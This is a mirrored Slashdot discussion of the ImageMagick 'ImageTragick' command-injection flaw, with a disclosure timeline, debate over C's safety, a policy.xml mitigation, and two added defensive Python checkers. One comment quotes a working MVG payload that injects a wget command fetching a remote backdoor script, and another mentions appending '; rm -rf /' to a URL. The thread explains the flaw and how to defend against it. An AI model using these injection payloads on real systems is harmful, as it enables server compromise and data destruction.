Slashdot Mirror


Huge Number Of Sites Imperiled By Critical Image-Processing Vulnerability (arstechnica.com)

Dan Goodin, reporting for Ars Technica: A large number of websites are vulnerable to a simple attack that allows hackers to execute malicious code hidden inside booby-trapped images. The vulnerability resides in ImageMagick, a widely used image-processing library that's supported by PHP, Ruby, NodeJS, Python, and about a dozen other languages. Many social media and blogging sites, as well as a large number of content management systems, directly or indirectly rely on ImageMagick-based processing so they can resize images uploaded by end users. According to developer and security researcher Ryan Huber, ImageMagick suffers from a vulnerability that allows malformed images to force a Web server to execute code of an attacker's choosing. Websites that use ImageMagick and allow users to upload images are at risk of attacks that could completely compromise their security. "The exploit is trivial, so we expect it to be available within hours of this post," Huber wrote in a blog post. He went on to say: "We have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them. An unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software."

22 of 104 comments

  1. Re:C for insecurity by dfn5 · · Score: 2

    Again, why are we still TODAY writing critical core libraries in what is probably the least secure language next to raw assembly? Go, Java, even Python would be much better alternatives.

    Right, cuz Oracle isn't pumping out a security fix for java every other week.

    --
    -- Thou hast strayed far from the path of the Avatar.
  2. Re: Fire, fire, fire, pants on fire! by Anonymous Coward · · Score: 4, Insightful

    Because keeping exploits secret leads to an ostrich mentality. Companies often prefer to shoot the messenger rather than solve the problem.

  3. Re:C for insecurity by Anonymous Coward · · Score: 2, Insightful

    It's not really the language, it's the coding.
    Like in human language, it's possible to say something grammatically incorrect in any language.

  4. Remind us what java and python are written in by Viol8 · · Score: 4, Funny

    Take your time.

  5. Hide the children! Block all images! by fustakrakich · · Score: 2

    Shit! The internet is Nightmare on Elm Street. I'm too scared to leave Slashdot and go out and read the article.

    --
    “He’s not deformed, he’s just drunk!”
  6. Its as secure as the programmer does .. by burni2 · · Score: 4, Insightful

    Why are they much better alternatives?
    The software written in (*) has no vulnerabilities?

    Choosing a language does not really address security, because that choice will affect how the programmer thinks about security, and possibly the less experienced programmers will slack on the "programming for safety" paradigm .. because the language does everything for the programmer.

    For example:
    Please have a look at fefe's gatling[1], an incredibly fast HTTP server with only very few security problems in the past - written entirely in "C". Also, the funny thing is that certain of these high-level languages will use bindings to these older libraries written in C.

    So you will be bitten again.

    From all information I overlook I can say, yes, in "C" it is incredibly easy to make simple errors with huge consequences - choosing types, for example. However, "C" programming can be made more secure with a strict application of certain rules, especially on "forbidden" & dangerous constructions. The misconception why "C" is deemed an insecure language is that much of the code in use stems from the "ancient" times, when such code was mostly not exposed to the raw, unforgiving "force" of the internet.

    Also, there was not such a "zoo" of other different programming languages, so much of the software was implemented using "C". This effect is similar to today's "I use Java now, I don't need to take care of security".

    The different incarnations of "C" standards also play their part, similar to the "Perl-Mageddon": if you do not have a concise standard about how a programming language will be "interpreted" or "translated", you are doomed to introduce errors. ImageMagick is bloated & ancient, two aspects that are problematic. Fefe adheres to his own standards, that bloat and complexity are the real threats to security (dietlibc vs. libc). And he is often correct on this topic.

    [1] http://www.fefe.de/

    1. Re:Its as secure as the programmer does .. by Flavianoep · · Score: 3, Interesting

      [1] http://www.fefe.de/

      That is the most Spartan website I've seen ever, and I am talking about the source too.

      --
      Linux is for people who don't mind RTFM.
    2. Re:Its as secure as the programmer does .. by dgatwood · · Score: 4, Interesting

      From all information I overlook I can say, yes, in "C" it is incredibly easy to make simple errors with huge consequences - choosing types, for example. However, "C" programming can be made more secure with a strict application of certain rules, especially on "forbidden" & dangerous constructions. The misconception why "C" is deemed an insecure language is that much of the code in use stems from the "ancient" times, when such code was mostly not exposed to the raw, unforgiving "force" of the internet.

      This—in much the same way that the huge number of PHP SQL injection attacks is not because PHP's SQL APIs are insecure, but rather because so much code is still around that was built against early APIs that lacked modern security features like template-based queries. Eventually, every language gets these sorts of complaints, and always for the same reason; most code out there is in a constant state of "deprecated, but still works, so we aren't going to touch it".

      --

      Check out my sci-fi/humor trilogy at PatriotsBooks.

    3. Re:Its as secure as the programmer does .. by omnichad · · Score: 2

      but rather because so much code is still around that was built against early APIs

      How old? Even with the old APIs, you rarely seem to find custom PHP code where somebody bothered to do so much as addslashes() and that's been around since PHP 4.

  7. Re:Fire, fire, fire, pants on fire! by Anonymous Coward · · Score: 5, Informative

    Suggestion: read the article and details before making assumptions. Because if you did, you would have seen that that was done. A patch was created but apparently not complete. They also include two mitigation 'patches' (config) in the disclosure. Considering the seriousness of this exploit (even I could understand it - which makes it beyond trivial), the more attention this gets, the better.

    From https://imagetragick.com/

            April, 21 2016 - file read vulnerability report for one of My.Com services from https://hackerone.com/stewie received by Mail.Ru Security Team. Issue is reportedly known to ImageMagick team.
            April, 21 2016 - file read vulnerability patched by My.Com development team
            April, 28 2016 - code execution vulnerability in ImageMagick was found by Nikolay Ermishkin from Mail.Ru Security Team while researching original report
            April, 30 2016 - code execution vulnerability reported to ImageMagick development team
            April, 30 2016 - code execution vulnerability fixed by ImageMagick (incomplete fix)
            April, 30 2016 - fixed ImageMagick version 6.9.3-9 published (incomplete fix)
            May, 1 2016 - ImageMagick informed of the fix bypass
            May, 2 2016 - limited disclosure to 'distros' mailing list
            May, 3 2016 - public disclosure at https://imagetragick.com/

  8. Re:Upload issue? Huh? by ArsenneLupin · · Score: 2

    Err, why is an image processing library doing network uploads anyway?

    Reading comprehension, where are you?

    The image processing library does just that, process images. In some cases, it processes images that have been uploaded by users to a web site (think Facebook photo albums), and if the user maliciously uploaded a booby-trapped photo, he can now make the website execute commands that were not intended by the site operator...

  9. Re:Fire, fire, fire, pants on fire! by OzPeter · · Score: 2

    Suggestion: read the article and details, before making assumptions.

    This is Slashdot. You must be new around here.

    What sort of newbie are you? He's AC .. I have seen him posting here for over a decade. He was one of the very first people to sign up for an account.

    --
    I am Slashdot. Are you Slashdot as well?
  10. Re:C for insecurity by MagicM · · Score: 4, Informative

    This bug has nothing to do with the language it's written in. It's a simple matter of failing to properly escape special characters when switching contexts (filename -> executable command). You can mess that up in any language.

  11. Re:Fire, fire, fire, pants on fire! by OzPeter · · Score: 2

    What sort of newbie are you? He's AC .. I have seen him posting here for over a decade.

    Over a decade ago most comments were posted under individual accounts and only goatse trolls posted under AC.

    So cut the guy some slack .. he's obviously cleaned up his life.

    --
    I am Slashdot. Are you Slashdot as well?
  12. Re:C for insecurity by grumbel · · Score: 3, Interesting

    I'd blame the OS instead. Giving each process full access to the system just isn't a good way to do things and constantly leads to problems like this. Python can stop some of those problems, but it provides by no means a secure sandbox. If you access the filesystem in Python, you still have full access to the filesystem. In cases such as this the process should be limited to exactly the data it needs to get the job done, meaning an input image, an output location and a bunch of configuration parameters.

  13. Image processing or url parsing? by MobyDisk · · Score: 2

    The headline says this is an image processing vulnerability. That makes it sound like someone could embed code into a PNG/JPG/SVG file or something like that. But skimming the linked articles, it looks more like ImageMagick has a server product with bad URL parsing.

    1. Re:Image processing or url parsing? by AC-x · · Score: 2

      That makes it sound like someone could embed code into a PNG/JPG/SVG file or something like that. But skimming the linked articles, it looks more like ImageMagick has a server product with bad URL parsing.

      From what I gathered you can embed code into SVG/MVG files, because it lets those formats specify embedded images by default and doesn't sanity check the URL.

      They give an MVG example for the exploit: image Over 0,0 1,1 'url(https:";wget "http://pastebin.com/raw/badpastebin" -O /home/vhosts/file/backdoor.pl")'

  14. An intermediate fix by Artem+S.+Tashkinov · · Score: 5, Informative

    Update your /etc/ImageMagick/policy.xml file so that it contains this (taken from http://imagetragick.com ) and restart corresponding daemons:

    <policymap>
      <policy domain="coder" rights="none" pattern="EPHEMERAL" />
      <policy domain="coder" rights="none" pattern="URL" />
      <policy domain="coder" rights="none" pattern="HTTPS" />
      <policy domain="coder" rights="none" pattern="MVG" />
      <policy domain="coder" rights="none" pattern="MSL" />
      <policy domain="coder" rights="none" pattern="TEXT" />
      <policy domain="coder" rights="none" pattern="SHOW" />
      <policy domain="coder" rights="none" pattern="WIN" />
      <policy domain="coder" rights="none" pattern="PLT" />
    </policymap>

    You're safe now. The full fix is still being worked out.
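A small audit script, added here as an example and not taken from the thread or from ImageMagick, that checks a policy.xml against the coder denials posted above and rewrites it so each of those coders has rights="none". The sample policy is constructed for the example (it leaves MVG at rights="read", the kind of half-applied entry a manual review can miss).

```python
"""Audit an ImageMagick policy.xml for the coder denials posted above."""
import xml.etree.ElementTree as ET

# Coders that the intermediate fix in the thread denies outright.
REQUIRED_DENIED = {"EPHEMERAL", "URL", "HTTPS", "MVG", "MSL",
                   "TEXT", "SHOW", "WIN", "PLT"}

# Constructed sample: denies only some coders and leaves MVG readable,
# an entry that is easy to overlook in a manual review.
SAMPLE_POLICY_XML = """<policymap>
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="coder" rights="none" pattern="EPHEMERAL" />
  <policy domain="coder" rights="none" pattern="URL" />
  <policy domain="coder" rights="read" pattern="MVG" />
  <policy domain="coder" rights="none" pattern="MSL" />
</policymap>
"""

def denied_coders(policy_xml: str) -> set:
    """Coder patterns whose rights are exactly 'none' (fully disabled)."""
    root = ET.fromstring(policy_xml)
    return {
        p.get("pattern", "").upper()
        for p in root.iter("policy")
        if p.get("domain") == "coder"
        and p.get("rights", "").strip().lower() == "none"
    }

def missing_denials(policy_xml: str) -> set:
    """Required coders that the policy still leaves enabled in some way."""
    return REQUIRED_DENIED - denied_coders(policy_xml)

def hardened_policy(policy_xml: str) -> str:
    """Rewrite the policy so every required coder has rights="none"."""
    # Drop weaker entries (e.g. rights="read") for those coders first, so
    # the result has exactly one unambiguous entry per coder.
    root = ET.fromstring(policy_xml)
    missing = missing_denials(policy_xml)
    for p in list(root.findall("policy")):
        if p.get("domain") == "coder" and p.get("pattern", "").upper() in missing:
            root.remove(p)
    for pattern in sorted(missing):
        ET.SubElement(root, "policy", domain="coder", rights="none", pattern=pattern)
    return ET.tostring(root, encoding="unicode")

if __name__ == "__main__":
    print("still enabled:", sorted(missing_denials(SAMPLE_POLICY_XML)))
    print(hardened_policy(SAMPLE_POLICY_XML))
```

Point it at the real file with `ET.parse` instead of the constructed sample to check a deployed policy; the other resource and delegate entries are left untouched.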

    1. Re:An intermediate fix by wwalker · · Score: 4, Informative

      And if you have the old version of ImageMagick (because you are on CentOS 5, for example) which doesn't support policy.xml, you can edit delegates.xml, by removing all delegates just to be safe. The file will be somewhere around: /usr/lib64/ImageMagick-6.2.8/config/

  15. Re:Upload issue? Huh? by ArsenneLupin · · Score: 3, Informative

    What, in your opinion, should the upload receiving routines check? In the example, the website would resize profile photos that users upload. One image format would have the possibility to "include" content that is to be downloaded from someplace else. ImageMagick performs such downloads by handing off that task to wget (or a similar tool), which it calls via system(), completely forgetting to sanitize the URL (... so somebody might append "; rm -rf /" to it, or somesuch). How do you propose that the upload routine of the web site catch this, short of parsing the entire image itself? But if it did that, there'd be no point in using an image processing tool at all, because the wrapper would already have done two thirds of the job.
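One answer to the question above, added here as an example rather than code from the thread: an upload routine does not need to parse the whole image, it only needs to confirm that the file begins with the magic bytes of a raster format the site actually accepts. ImageMagick selects its coder from the file content, not the name, so a text-based MVG or SVG script renamed to .jpg is rejected before the library ever sees it. The sample files and the assumption that the site accepts only PNG, JPEG and GIF profile photos are constructed for this example.

```python
"""Reject uploads whose leading bytes do not match an expected raster format."""

# Magic bytes for the raster formats a profile-photo uploader expects.
# Anything else (including MVG/SVG, which are plain text) is rejected
# before ImageMagick sniffs the content and picks a coder for it.
RASTER_MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpeg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}
ALLOWED_EXTENSIONS = {"png": "png", "jpg": "jpeg", "jpeg": "jpeg", "gif": "gif"}

def sniff_raster_type(data: bytes):
    """Return 'png', 'jpeg' or 'gif' based on the leading bytes, else None."""
    for kind, magics in RASTER_MAGIC.items():
        if any(data.startswith(m) for m in magics):
            return kind
    return None

def check_upload(filename: str, data: bytes) -> tuple:
    """Return (accepted, reason). The extension must be allowed and the
    content must carry the magic bytes of that same format."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    expected = ALLOWED_EXTENSIONS.get(ext)
    if expected is None:
        return False, "extension not allowed"
    actual = sniff_raster_type(data)
    if actual is None:
        return False, "content is not a recognised raster image"
    if actual != expected:
        return False, f"content is {actual} but name claims {expected}"
    return True, "ok"

# Constructed samples: a minimal PNG header, and a harmless MVG script
# given a .jpg name (the shape of file the thread is discussing).
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
MVG_TEXT = b"push graphic-context\nviewbox 0 0 640 480\npop graphic-context\n"

if __name__ == "__main__":
    for name, blob in [("avatar.png", PNG_HEADER), ("avatar.jpg", MVG_TEXT),
                       ("avatar.jpg", PNG_HEADER)]:
        print(name, check_upload(name, blob))
```

This check narrows what reaches ImageMagick; it complements the policy.xml coder denials rather than replacing them.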

  16. Re:C for insecurity by GiganticLyingMouth · · Score: 3, Informative

    Strictly speaking, those two aren't equivalent. The C example is using dynamic memory with runtime sizing, while the C++ one is using static sizing (and that array would be allocated on the stack). std::vector p would be the C equivalent. Other than that, I agree with you. Pretty much the only reason to use C these days is if your platform doesn't have a good C++ compiler.

  17. Use GraphicsMagick instead by thisisauniqueid · · Score: 3, Informative

    Turns out we should have been using the better fork since 2002 anyway.